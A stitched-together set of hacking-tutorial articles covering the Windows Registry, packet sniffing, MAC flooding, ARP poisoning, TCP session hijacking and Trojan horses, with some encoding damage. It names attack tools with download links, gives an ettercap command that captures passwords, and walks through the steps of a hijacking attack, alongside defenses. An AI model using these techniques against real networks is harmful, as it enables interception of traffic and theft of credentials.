REG EXPORT �? This is exactly the same as the ?REG LOAD? command.




REG IMPORT c:\file.reg �? Imports the ?file.reg? located in c:\ to the Registry.




Final Notes




Notice that 'REG.EXE' application is a command line tool that is intended for Windows NT4,2000,XP,2003 but it is built-in only in XP and 2003. The 'REGEDIT.EXE' application has a GUI (graphical user interface) and some command line parameters. The REGEDT32.EXE application is only present on 32-bit Windows Operational Systems such as Windows NT4,2000,XP,2003.




Remember to ALWAYS make a complete backup before editing the Registry as well as editing any other kind of configurations, files, important informations, etc.




This article will show, explain and detail some things related to the Windows Registry and you will probably learn some cool things from it, but it will NOT , in any way make you become an Expert; There is lots and lots of other tricky things you can do with this cute little tool called ?Regedit?, such as editing information and configurations of softwares and services, set up specific restrictions to the Registry itself or to any other Software, change the OS look, visual effects and some graphical related stuff, among other things and you will have to look deep inside and understand the meaning of some common used value datas. Tip: Look deep inside REG_DWORD values data and you will learn a lot and better understand the options and configurations that were set up in your Windows.




Finally, I hope you have enjoyed �??




---------------*END*-----------------

Sniffers are a powerful piece of software. They have the capability to place the hosting system's network card into promiscuous mode. A network card in promiscuous mode can receive all the data it can see, not just packets addressed to it. If you are on a hub, a lot of traffic can potentially be affected. Hubs see all the traffic in that particular collision domain. Sniffing performed on a hub is known as passive sniffing. Ethernet switches are smarter. A switch is supposed to be smart enough to know which particular port to send traffic to and block it from all the rest. However, there can be exceptions to this rule. Sometimes switches have one port configured to receive copies of all the packets in the broadcast domain. That type of port spanning is done for administrative monitoring. When sniffing is performed on a switched network, it is known as active sniffing. Sniffers operate at the Data Link layer of the OSI model. This means that they do not have to play by the same rules as applications and services that reside further up the stack. Sniffers can grab whatever they see on the wire and record it for later review. They allow the user to see all the data contained in the packet, even information that should remain hidden. Passive sniffing is performed when the user is on a hub. Because the user is on a hub, all traffic is sent to all ports. All the attacker must do is to start the sniffer and just wait for someone on the same collision domain to start sending or receiving data. A collision domain is a logical area of the network in which one or more data packets can collide with each other. Whereas switches separate up, collision domain hubs place users in one single shared collision domain. Hubs place users in a shared segment or collision domain. The other reason that sniffing has lost some of its mystical status is that so many more people use encryption than in the past. Protocols such as Secure Sockets Layer (SSL) and Secure Shell (SSH) have mostly replaced standard Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP). With all the barriers in place, we will see what a hacker must do to successfully use a sniffer.


[Active Sniffing]


For sniffers to be successfully used, the attacker must be on your local network or on a prominent intermediary point, such as a border router, through which traffic passes. The attacker must also know how to perform active sniffing. A switch limits the traffic that a sniffer can see to broadcast packets and those specifically addressed to the attached system. Traffic between two other hosts would not normally be seen by the attacker, as it would not normally be forwarded to the switch port that the sniffer is plugged in to. Media Access Control (MAC) flooding and Address Resolution Protocol (ARP) poisoning are the two ways that the attacker can attempt to overcome the limitations imposed by a switch.

MAC flooding is the act of attempting to overload the switches content addressable memory (CAM) table. All switches build a lookup table that maps MAC addresses to the switch port numbers. This enables the switch to know what port to forward each specific packet out of. The problem is that in older or cheaper switches, the amount of memory is limited. If the CAM table fills up and the switch can hold no more entries, some might divert to a fail open state. This means that all frames start flooding out all ports of the switch. This allows the attacker to then sniff traffic that might not otherwise be visible. The drawback to this form of attack is that the attacker is now injecting a large amount of traffic into the network. This can draw attention to the attacker. With this type of attack, the sniffer should be placed on a second system because the one doing the flooding will be generating so many packets that it might be unable to perform a suitable capture. Tools for performing this type of attack include:

EtherFlood EtherFlood floods a switched network with Ethernet frames with random hardware addresses. The effect on some switches is that they start sending traffic out on all ports so that you can sniff all the traffic on the network. EtherFlood can be downloaded from http://ntsecurity.nu/toolbox/etherflood.

SMAC A MAC spoofing tool that allows an attacker to spoof their MAC address. They can change their MAC address to any other value or manufacturer they would like. SMAC is available from www.klcconsulting.net/smac.

Macof Macof floods the LAN with false MAC addresses in hopes of overloading the switch. It can be downloaded from http://monkey.org/~dugsong/dsniff

[ARP Poisoning]


ARP poisoning is the second method that can be used to overcome switches. A review of the ARP process will help in your understanding of how this is possible. Address Resolution Protocol is a helper protocol that in many ways is similar to domain name service (DNS). DNS resolves known domain names to an unknown IP addresser. ARP resolves known IP addresses to unknown MAC addresses. Both DNS and ARP are two-step protocols. ARP is how network devices associate a specific MAC address with an IP address so that devices on the local network can find each other. As an example, think of MAC addresses as physical street addresses, whereas IP addresses are logical names. You might know that my name is Michael Gregg and because I'm the author of this book, you would like to send me a note about it. The problem is that knowing my name is not enough. You need a physical address to know where the note to Michael Gregg should be delivered. ARP serves that purpose and ties the two together. ARP is a simple protocol that consists of two message types:

An ARP Request Computer A asks the network, "Who has this IP address?"

An ARP Reply Computer B tells computer A, "I have that IP. My MAC address is XYZ."

The developers of ARP lived in a much more trusting world than we do today, so they made the protocol simple. The problem is that this simple design makes ARP poisoning possible. When an ARP request is sent, the system simply trusts that when the ARP reply comes in, it really does come from the correct device. ARP provides no way to verify that the responding device is really who it says it is. It's so trusting that many operating systems accept ARP replies, even when no ARP request was made. To reduce the amount of ARP traffic on a network system, implement something called an ARP cache. The ARP cache stores the IP address, the MAC address, and a timer for each entry. The timer varies from vendor to vendor, so OSes such as Mcft use 2 minutes and many Linux vendors use 15 minutes. You can view the ARP cache for yourself by issuing the arp -a command.

With a review of the ARP process out of the way, you should now be able to see how ARP spoofing works. The method involves sending phony ARP requests or replies to the switch and other devices to attempt to steer traffic to the sniffing system. Bogus ARP packets will be stored by the switch and by the other devices that receive the packets. The switch and these devices will place this information into the ARP cache and now map the attacker to the spoofed device. The MAC address being spoofed is usually the router so that the attacker can capture all outbound traffic.

First, the attacker would say that the router's IP address is mapped to his MAC address. Second, the victim now attempts to connect to an address outside the subnet. The victim has an ARP mapping showing that the router's IP is mapped to the hacker's MAC; therefore, the physical packets are forwarded through the switch and to the hacker. Finally, the hacker forwards the traffic onto the router. After this setup is in place, the hacker is able to pull off many types of man-in-the-middle attacks. This includes passing on the packets to their true destination, scanning them for useful information, or recording the packets for a session replay later. IP forwarding is a critical step in this process. Without it, the attack will turn into DoS. There are many tools for performing ARP spoofing attacks for both Windows and Linux. A few are introduced here:

Arpspoof Part of the Dsniff package of tools written by Dug Song. Arpspoof redirects packets from a target system on the LAN intended for another host on the LAN by forging ARP replies.

Ettercap One of the most feared ARP poisoning tools because Ettercap can be used for ARP poisoning, for passive sniffing, as a protocol decoder, and as a packet grabber. It is menu driven and fairly simple to use. As an example, ettercap Nzs will start ettercap in command-line mode (-N), not perform an ARP storm for host detection (-z), and passively sniff for IP traffic (-s). This will output packets to the console in a format similar to Windump or Tcpdump. Ettercap exits when you type q. Ettercap can even be used to capture usernames and passwords by using the C switch. Other common switches include: N is Non-interactive mode, z starts in silent mode to avoid ARP storms, and a is used for ARP sniffing on switched networks.

Cain A multipurpose tool that has the capability to perform a variety of tasks, including ARP poisoning, Windows computer enumeration, sniffing, and password cracking. The ARP poisoning function is configured through a GUI interface.

Sniffers, such as Ethereal, are capable of displaying multiple views of captured traffic. Three main views are available, which include

Summary

Detail

Hex


The uppermost window shows the summary display. It is a one line per packet format. The highlighted line shows the source and destination MAC address, the protocol that was captured, ARP, and the source and destination IP address. The middle window shows the detail display. Its job is to reveal the contents of the highlighted packet. Notice that there is a plus sign in front of these fields. Clicking on the plus sign reveals more detail. The third and bottom display is the hex display. The hex display represents the raw data. There are three sections to the hex display. The numbers to the left represent the offset in hex of the first byte of the line. The middle section shows the actual hex value of each portion of the headers and the data. The right side of the display shows the sniffers translation of the hex data into its American Standard Code for Information Exchange (ASCII) format. It's a good place to look for usernames and passwords.

An important feature of a sniffer such as Ethereal is the capability it has to set up filters to view specific types of traffic. Filters can be defined in one of two ways:

Capture filters Used when you know in advance what you are looking for. They allow you to predefine the type of traffic captured. As an example, you could set a capture filter to capture only HTTP traffic.

Display filters Done after the fact. Display filters are used after the traffic is captured. Although you might have captured all types of traffic, you could apply a display filter to show only ARP packets.

Although Ethereal is useful for an attacker to sniff network traffic, it's also useful for the security professional. Sniffers allow you to monitor network statistics and discover MAC flooding or ARP spoofing. Filters are used to limit the amount of captured data viewed and to focus on a specific type of traffic.

[Defence]

Sniffing is a powerful tool in the hands of a hacker, and as you have seen, many sniffing tools are available. Defenses can be put in place. It is possible to build static ARP entries, but that would require you to configure a lot of devices connected to the network; it's not that feasible. A more workable solution would be port security. Port security can be accomplished by programming each switch and telling them which MAC addresses are allowed to send/receive and be connected to each port. Again, if the network is large, this can be a time-consuming process. The decision has to take into account the need for security versus the time and effort to implement the defense. Use encryption. IPSec, VPNs, SSL, and PKI can all make it much more difficult for the attacker to sniff valuable traffic. Linux tools such as Arpwatch are also useful. Arpwatch keeps track of ethernet/ip address pairings and can report unusual changes. Even DNS spoofing can be defeated by using DNS Security Extensions (DNSSEC). It digitally signs all DNS replies to ensure their validity. RFC 4035 is a good reference to learn more about this defense.

[Session Hijacking]


Session hijacking is when sensitive information is stolen or viewed with out knowledge or permission. This hijacking is not always common but when performed is extremely dangerous. Session hijacking is when an attacker relies on user to connect and authenticate and then take over the session. In spoofing attack, the attacker pretends to be another user or machine to gain access. Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Session hijacking can be active or passive on the degree of involvement of the attacker. Many tools exist to aid the attacker in perpetrating a session hijack. Like previously said, Session Hijacking could be very dangerous and there is a need for implementing strict protection. In this article I will focus more on ACK Storms, TCP/IP Methods, Sequence attack Prediction, Hijack Tools, Types of Hijacks and difference between spoofing and Hijacking. The whole point of session hijacking is to get authentication to an active system. Hacking onto systems is not always a trivial act. Session hijacking provides the attacker with an authenticated session to which he can then execute commands. The problem is that the attacker must identify and find a session This process is much easier when the attacker and the victim are on the same segment of the network. If both users are on a hub, this process requires nothing more than passive sniffing. If a switch is being used, active sniffing is required. Either way, if the attacker can sniff the sequence and acknowledgement numbers, a big hurdle has been overcome because otherwise it would be potentially difficult to calculate these numbers accurately. Sequence numbers are discussed in the next section. If the attacker and the victim are not on the same segment of the network, blind sequence number prediction must be performed. This is a more sophisticated and difficult attack because the sequence and acknowledgement numbers are unknown. To circumvent this, several packets are sent to the server to sample sequence numbers. If this activity is blocked at the firewall, the probe will fail. Also, in the past, basic techniques were used for generating sequence numbers, but today, that is no longer the case because most OSes implement random sequence number generation, making it difficult to predict them accurately. Force all incoming connections from the outside world to be fully encrypted, And all connections to critical machines to be fully encrypted. Force all traffic on the network to be encrypted. Using encrypted protocols, like those found in the OpenSSH suite. The OpenSSH suite includes the ssh program which replaces rlogin and telnet, scp which replaces rcp, and sftp which replaces ftp. Also included is sshd which is the server side of the package, and the other basic utilities like ssh-add, ssh-agent, ssh-keygen and sftp-server. All these steps will prevent and protect you and your information's from any kind of hijacking.

[TCP/IP Hijacking]

TCP hijacking relies on the violation of trust relationships between two interacting hosts. Let take a look at the TCP stack and the IPv4 protocol to understand why this is possible.

(TCP stack)

Every time when you access the Internet with your browser like Internet Explorer, It works at the application layer and accepts the initial datagram to be sent across the Internet. The transport protocol comes into action in the next layer called the transport layer, and the appropriate protocol header is added to the datagram. Here it is TCP header, as it is the TCP protocol that is being used. This ensures the reliability of data transported over inherently unreliable communication platforms, and also controls many of the aspects in the management and initiation of communication between the two hosts. In the network layer, routers offer the functionality for the datagram to hop from source to the destination, one hop at a time. This also sees the IP header being added to the datagram. The final layer that communicated with the physical system is the data link layer. This layer is responsible for the delivery of signals from the source to the destination over a physical communication platform, which is the Ethernet. This layer also sees the frame header being added to the datagram.

(IPv4)

The headers are peeled back on reaching the destination to reveal the original datagram. The original IPv4 standard needed to address three basic security issues - authentication, integrity and privacy. Authentication was an issue because an attacker could easily spoof an IP address and exploit a session. Spoofing was not restricted to IP address alone, but also extended to MAC addresses in ARP spoofing. An attacker sniffing on a network could sniff packets and carry out simple attacks such as change, delete, reroute, add, forge or divert data. Perhaps the most popular among these attacks is the Man-In-the-Middle attack. An attacker can grab unencrypted traffic from a victim's network-based TCP application, further tampering with the authenticity and integrity of the data before forwarding it on to the unsuspecting target.


[Spoofing & Hijacking]


(SPOOFING)

Spoofing can be summed up in a single sentence: It's a sophisticated technique of authenticating one machine to another by forging packets from a trusted source address. A spoofing attack is different from a hijack. In spoofing an attacker is not taking another user offline to perform the attack. He pretends to be another user or machine to gain access. Like for example say a Host only allows certain IP's to connect to that server and all others are blocked, an Attacker can change or more technical "Spoof" his MAC addresses with SMAC or BMACC Tools and gets fake IP and connects to the server. Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction.
TCP sequence numbers are used to provide flow control and data integrity for TCP sessions. Every byte in a TCP session has a unique sequence number. Moreover, every TCP segment provides the sequence number of the initial byte (ISN), as part of the segment header. The initial sequence number does not start at zero for each session. Instead, the participants specify initial sequence numbers as part of the handshake process-a different ISN for each direction-and begin numbering the bytes sequentially from there.

Blind IP spoofing relies on the attacker's ability to predict sequence numbers as he is unable to sniff the communication between the two hosts by virtue of not being on the same network segment. He cannot spoof a trusted host on a different network and see the reply packets because the packets are not routed back to him. He cannot resort to ARP cache poisoning as well because routers do not route ARP broadcasts across the Internet. As he is not able to see the replies he is forced to anticipate the responses from the victim and prevent the host from sending a RST to the victim. The attacker then injects himself into the communication by predicting what sequence number the remote host is expecting from the victim. This is used extensively to exploit the trust relationships between users and remote machines, these services include NFS, NetBIOS, FTP, and so on.

IP spoofing is relatively easy to accomplish. The only pre-requisite on part of the attacker is to have root access on a machine in order to create raw packets. In order to establish a spoofed connection the attacker must know what sequence numbers are being used. Therefore, IP spoofing forces the attacker to have to predict the next sequence number.

The attacker can use "blind" hijacking, to send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. By SYN flooding the trusted host, Attacker establishes a short connection which is then used to gain access through common methods.

IP spoofing can only be implemented against certain machines running certain services. Many flavors of Unix are viable targets. (This shouldn't give you the impression that non-Unix systems are invulnerable to spoofing attacks. Most network services use IP-based authentication, and although RPC, X Window System, and the r services have problems inherent to Unix-based operating systems, other operating systems are not immune.

The following are some of the configurations and services are known to be vulnerable:

Any device running Sun RPC

Any network service that uses IP address authentication

The X Window System from MIT

The r services

These are the essential steps that must be taken in a spoofing attack:


1. The cracker must identify his targets.

2. He must anesthetize the host he intends to impersonate.

3. He must forge the address of the host he's impersonating.

4. He must connect to the target, masquerading as the anesthetized host.

5. He must accurately guess the correct sequence number requested by the target.

(HIJACKING)

Hijacking is when an attacker is taking over an existing session, which means he is relying on the legitimate user to make a connection and authenticate. Then take over the session.
So basically attacker is connected to the user and is waiting for him to connect and do his job. If the user doesn't connect than the attack fails. With IP Spoofing there is no need to guess the sequence number since there is no session currently open with that IP address. The traffic would get back to the attacker only by using source routing. This is where the attacker tells the network how to route the output and input from a session, and he simply sniffs it from the network as it passes by him. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers. This works when an attacker uses captured, reverse engineered or brute forced authentication tokens to take over the control of a legitimate user's session while he is in session, the session is said to be hijacked. Due to this attack, the legitimate user may loose access or be deprived of the normal functionality of the session to the attacker, who now acts with the user's privileges. Most authentications occur at the beginning of a TCP session; this makes it possible for the attacker to gain access to a target machine. A popular method attackers adopt is to use source-routed IP packets. This allows an attacker to become a part of the target - host conversation by deceiving the IP packets to pass through his system. The attacker can also carry out the classic man-in-the-middle attack using a sniffing program to monitor the conversation. In TCP session hijacking, a familiar aspect of the attacks is the carrying out of a denial-of-service (DoS) attack against the target & host to prevent it from responding by either forcing the machine to crash, or against the network connection to result in a heavy packet loss. Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Knowledge of the ISN would be the least of John's challenges. For instance, he would need a way to knock Jane off the air at will. He also would need a way to know the exact status of Jane's session at the moment he mounted his attack. Both of these require that John have far more knowledge about and control over the session than normally would be possible. However, IP address spoofing attacks can only be successful if IP addresses are used for authentication. An attacker cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. Similarly, neither IP address spoofing nor session hijacking are possible if the session uses encryption such as SSL or PPTP, as the attacker will not be able to participate in the key exchange. Therefore the essential requirements to hijack non-encrypted TCP communications can be listed as: Presence of non-encrypted session oriented traffic, ability to recognize TCP sequence numbers and predict the next sequence number (NSN) and capability to spoof a hosts MAC or IP address to receive communications which are not destined for the attackers host. If the attacker is on the local segment, they can sniff and predict the ISN+1 number and have the traffic routed back to them by poisoning the ARP cache.

[How Session Hijacking is performed]

First is to Track the session. Second is to desynchronizing the connection. Then third is Resetting the connection. And finally fourth is Injecting your packets.

Let's look closer at each step.

[tracking the connection]

Hacker will wait to find a suitable target and host. He uses a network sniffer to track the victim and host or identify a suitable user by scanning with nmap to find a target with a trivial TCP sequence prediction. This is done to ensure that because the correct sequence and acknowledgement numbers are captured, as packets are checked by TCP through sequence and acknowledgement numbers. These will later be used by the attacker in making his own packets.

[Desynchronizing the connection]

When a connection between the target and host is in the established state; or in a stable state with no data transmission; or the server's sequence number is not equal to the client's acknowledgement number; or the clients sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number SEQ/ACK of the server must be changed. This can be done if null data is sent to the server so that the server's SEQ/ACK numbers will advance; while the target machine will not register such a change.
The desynchronizing is seen by the attacker monitoring the session without interference till an opportune moment, when he will send a large amount of "null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker also does same thing to the target. Now both the server and target are desynchronized.

[Resetting the connection]

Another trick is to send a reset flag to the server and tearing down the connection on the server side. This is usually done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with different sequence number.
The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters such as port number but a different sequence number. The server on receiving the RST packet, closes connection with the target, but initiates another one based on the SYN packet - with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in desynchronized but established state.
Since TCP uses IP the loss of a single packet puts an end to the unwanted conversation between the server and target on the network. The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well.

[Injecting your packets]

Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa.

[Active and Passive attacks]

In an active attack, an attacker finds an active session and takes over. With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth. The main difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an on-going session.

Generally a [passive attack] uses sniffers on the network allowing the attacker to obtain information such as user id and password so that he can use it later to logon as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed when raw access to a network is obtained. Counters against this attack range from using identification schemes such as one-time password to ticketing identification. While these may keep sniffing from yielding any productive results, they do not insure the network from an active attack neither as long as the data is neither digitally signed nor encrypted.

In an [active attack], the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle.

This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.

[Sequence Numbers]

Sequence Numbers are very important to provide reliable communication but they are also important to hijacking a session.
The numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations. They are used to tell the receiving machine what order the packets should go in when they are received. Therefore an attacker must successfully guess the sequence number to hijack a session.

TCP provides a full duplex reliable stream connection between two end points. A connection is uniquely defined by the IP address of sender, TCP port number of the sender, IP address of the receiver and TCP port number of the receiver.

Every byte that is sent by a host is marked with a sequence number and is acknowledged by the receiver using this sequence number. The sequence number for the first byte sent is computed during the connection opening. It changes for any new connection based on rules designed to avoid reuse of the same sequence number for two different sessions of a TCP connection.

Let's say we sent the increment of sequence number in our discussion of the three way handshake. What happens if the sequence number is predictable? When the TCP sequence is predictable, an attacker can send packets that are forged to appear to come from a trusted computer.

The next step taken was to tighten the OS implementation of TCP and introduce randomness in the ISN. This was done by the use of pseudo-random number generators (PRNGs). PRNGs introduced some randomness when producing ISNs used in TCP connections. However, adding a series of numbers together provided insufficient variance in the range of likely ISN values; thereby allowing an attacker to disrupt or hijack existing TCP connections or spoof future connections against vulnerable TCP/IP stack implementations.

This implied that systems relying on random increments to make ISN numbers harder to guess were still vulnerable to statistical attack. Basically with the passage of time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm that is used by a particular operating system. Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible.

If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session if he is aware of the number of bytes transmitted in the session this far.

As this is a difficult proposition, the attacker can guess a suitable range of sequence numbers and send out a number of packets into the network with different sequence numbers - but falling within the range. Since the range is known, it is likely that at least one packet will be accepted by the server. This way, the attacker doesn't need to send a packet for every sequence number, but resort to sending an appropriate number of packets with sequence numbers a window-size apart.


But how does he know how many packets are to be sent?

This is obtained by dividing the range of sequence numbers to be covered by the fraction of the window size that is used as an increment. Why is this possible despite the introduction of PRNGs? The problem lay in the use of increments themselves, random or otherwise, to advance an ISN counter, making statistical guessing practical. The result of this is that remote attackers can perform session hijacking or disruption by injecting a flood of packets with a range of ISN values, one of which may match the expected ISN. The more random the ISNs are, the more difficult it is to carry out these attacks.

[Spoofing/Hijacking Tools]


Several programs are available that perform session hijacking. The following are a few that belong to this category:

Ettercap - Ettercap runs on Linux, BSD, Solaris 2.x, most flavors of Windows, and Mac OS X. Ettercap will ARP spoof the targeted host so that any ARP requests for the target's IP will be answered with the sniffer's MAC address, allowing traffic to pass through the sniffer before ettercap forwards it on. This allows ettercap to be used as an excellent man-in-the-middle tool. Ettercap uses four modes:

- IP The packets are filtered based on source and destination.

- MAC Packet filtering based on MAC address.

- ARP ARP poisoning is used to sniff/hijack switched LAN connections (in full-duplex mode).

- Public ARP ARP poisoning is used to allow sniffing of one host to any other host.

Hunt - This is one of the best known session hijacking tools. It can watch, hijack, or reset TCP connections. Hunt is meant to be used on Ethernet and has active mechanisms to sniff switched connections. Advanced features include selective ARP relaying and connection synchronization after attacks. Requirements: C compiler, Linux.

TTY Watcher - This Solaris program can monitor and control users' sessions.

IP Watcher - IP Watcher is a commercial session hijacking tool that allows you to monitor connections and has active countermeasures for taking over a session.

T-Sight - This commercial hijack tool has the capability to hijack any TCP sessions on the network, monitor all your network connections in real-time, and observe the composition of any suspicious activity that takes place.

1644 - TTCP spoofing Tool. {Source} - Requirements: C compiler, IP header files, FreeBSD.

Juggernaut - Linux Tool, networking and packet spoofing tool. {Source} - Requirements: C compiler, IP Header Files, Unix.

synk4.c - Syn Flooder tool that allows IP Spoofing and packet spoofing. {Source} - Requirements: C compiler, IP header files, Linux

Trojan ( bad ) Beware !!!!
Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.


Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).




There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.



Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.
Definition


A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.


In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.



Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
upload and download files.
allowing remote access to the victim's computer. This is called a RAT. (remote administration tool)
spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
make screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phish for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing CD-ROM tray

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.


Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense ?close the hole? that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.




Methods of Infection


The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

